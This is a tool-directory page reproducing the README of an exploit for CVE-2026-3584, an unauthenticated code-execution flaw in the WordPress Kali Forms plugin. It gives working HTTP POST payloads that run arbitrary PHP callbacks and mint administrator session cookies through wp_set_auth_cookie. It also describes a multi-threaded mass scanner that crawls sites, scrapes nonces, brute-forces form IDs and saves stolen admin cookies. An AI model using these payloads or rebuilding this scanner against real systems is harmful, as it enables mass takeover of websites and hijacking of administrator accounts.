Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-3584 — CVE-2026-3584 | Kitploit
Tools/GitHubGitHub/yucaerin/cve-2026-3584
Privilege EscalationReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration TestingPayload Development
GitHubyucaerin/cve-2026-3584

CVE-2026-3584

CVE-2026-3584

View Repository
3126 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-3584 – WordPress Kali Forms <= 2.4.9 - Unauthenticated Remote Code Execution via form_process

🔥 Vulnerability Summary

The WordPress Kali Forms plugin versions <= 2.4.9 contain a critical unauthenticated remote code execution (RCE) vulnerability. This flaw allows unauthenticated attackers to execute arbitrary PHP code on the server and gain full administrator privileges through the kaliforms_form_process AJAX endpoint, which is publicly exposed without authorization checks.

The vulnerability resides in the form_process function, which accepts user-controlled parameters (including thisPermalink and entryCounter) and executes arbitrary PHP callbacks, leading to:

  • Remote Code Execution (RCE) via phpinfo(), system(), eval(), etc.
  • Privilege Escalation via wp_set_auth_cookie() to obtain administrative sessions

🔍 Vulnerable Plugin

  • Plugin Name: Kali Forms – WordPress Form Builder
  • Vulnerable Version: <= 2.4.9
  • Vulnerability Type: Unauthenticated Remote Code Execution + Privilege Escalation
  • CVE ID: CVE-2026-3584
  • CVSS Score: 10.0 (Critical)
  • Impact: Full site compromise, administrative access, persistence
  • Link: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process

🔓 How the Vulnerability Works

Technical Bug Analysis

The vulnerability manifests in the form_process function of the Kali Forms plugin that handles AJAX requests. The vulnerable code is exposed via:

// AJAX endpoint accessible without authentication
add_action('wp_ajax_nopriv_kaliforms_form_process', array($this, 'form_process'));

Exploit Flow:

  1. Unprotected Endpoint: The /wp-admin/admin-ajax.php?action=kaliforms_form_process endpoint is accessible to unauthenticated users via the wp_ajax_nopriv_ hook.

  2. User-Controllable Parameters:

    • data[thisPermalink] - can contain an arbitrary PHP function name
    • data[entryCounter] - can contain an arbitrary PHP function name
    • data[formId] - ID of the form to process
  3. Unfiltered Callback Execution: The vulnerable code executes PHP callbacks without validation:

    $callback = $_POST['data']['thisPermalink'];
    call_user_func($callback);  // No validation!
    
  4. Exploit Chain:

    Attacker → POST Request → kaliforms_form_process
         ↓
    

thisPermalink=phpinfo → call_user_func('phpinfo') ↓ PHP Code Execution → phpinfo() executed ↓ entryCounter=wp_set_auth_cookie → Admin cookie generated ↓ Full Admin Access


**Vulnerable Request Example:**

```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=kaliforms_form_process&
data[formId]=1&
data[nonce]=abc123&
data[thisPermalink]=phpinfo&
data[email][email protected]

Result: The server executes phpinfo() and returns complete information about the PHP configuration.

For Privilege Escalation:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=kaliforms_form_process&
data[formId]=1&
data[nonce]=abc123&
data[entryCounter]=wp_set_auth_cookie&
data[email][email protected]

Result: WordPress executes wp_set_auth_cookie(user_id) where user_id often corresponds to formId, generating valid administrator session cookies.


🛠 Mass Scanner - How It Works

Scanner Architecture

The mass_scanner.py implements an automated 4-phase pipeline for the complete exploitation of the CVE-2026-3584 vulnerability:

┌─────────────────────────────────────────────────────────────────┐
│                    MASS SCANNER PIPELINE                        │
├─────────────────────────────────────────────────────────────────┤
│                                                                 │
│  Phase 1: REST API Reconnaissance                               │
│  ├─ Enumerate users: /wp-json/wp/v2/users                       │
│  └─ Enumerate posts: /wp-json/wp/v2/posts                       │
│      → Identify user_id and post_id for escalation              │
│                                                                 │
│  Phase 2: Form Discovery                                        │
│  ├─ Crawl site (depth=2)                                        │
│  ├─ Search for patterns: 'KaliFormsObject', 'kaliforms'         │
│  ├─ Extract nonce from JavaScript                               │
│  └─ Extract formId from HTML                                    │
│      → Find all vulnerable Kali Forms forms                     │
│                                                                 │
│  Phase 3: RCE Test                                              │
│  ├─ Send: data[thisPermalink]=phpinfo                           │
│  ├─ Verify: 'PHP Version' in response                           │
│  └─ Save: result/target_phpinfo.html                            │
│      → Confirm remote code execution                            │
│                                                                 │
│  Phase 4: Privilege Escalation                                  │
│  ├─ Send: data[entryCounter]=wp_set_auth_cookie                 │
│  ├─ Extract: wordpress_logged_in + wordpress_sec cookies        │
│  ├─ Verify: access to /wp-admin/ without redirect               │
│  └─ Save: result_cookie/target.txt                              │
│      → Obtain full administrator access                         │
│                                                                 │
└─────────────────────────────────────────────────────────────────┘

Implementation Technical Details

1. Automatic URL Normalization

def normalize_url(self, target):
    # Automatically adds http:// or https://
    # Tries HTTPS first, then falls back on HTTP
    # Handles custom ports (e.g. :8080)

2. REST API Enumeration

def enumerate_users_api(self, target):
    # GET /wp-json/wp/v2/users
    # Extracts all available user_ids
    # Used to map formId → user_id
    
def enumerate_posts_api(self, target):
    # GET /wp-json/wp/v2/posts
    # Extracts all available post_ids
    # Identifies user_id/post_id overlaps

3. Form Discovery (Intelligent Crawling)

def discover_pages(self, target, max_depth=2):
    # Recursively crawls the site
    # Searches for JavaScript patterns: 'KaliFormsObject'
    # Filters out unnecessary URLs (js, css, images)
    # Follows only internal links
    # Returns list of pages with Kali Forms

4. Form Data Extraction

def extract_form_data(self, page_url):
    # Extracts nonce from JavaScript:
    #   KaliFormsObject = { ajax_nonce: "abc123" }
    # Extracts formId from HTML:
    #   data-id="1" or [kaliform id="1"]
    # If nonce found but no formId:
    #   Brute force IDs 1-10

5. RCE Test

def test_rce(self, target, form_id, nonce):
    # POST /wp-admin/admin-ajax.php
    # Payload: data[thisPermalink]=phpinfo
    # Checks: len(response) > 10000 and 'PHP Version' present
    # Saves full HTML for analysis

6. Privilege Escalation Test

def test_privilege_escalation_fast(self, target, nonce, user_ids, post_ids):
    # Smart strategy:
    # 1. Look for user_id/post_id overlaps
    # 2. Test IDs with high success probability first
    # 3. Fallback on common IDs: 1,2,3,4,5
    
    # For each candidate formId:
    # POST data[entryCounter]=wp_set_auth_cookie
    # Extracts cookies: wordpress_logged_in + wordpress_sec
    # Checks: GET /wp-admin/ → no redirect
    # Verifies: 'dashboard' in response

7. Multi-Threading

# ThreadPoolExecutor for parallel processing
# Thread-safe locks for writing results
# Real-time saving (append mode)
# Global statistics with sync
Download Tool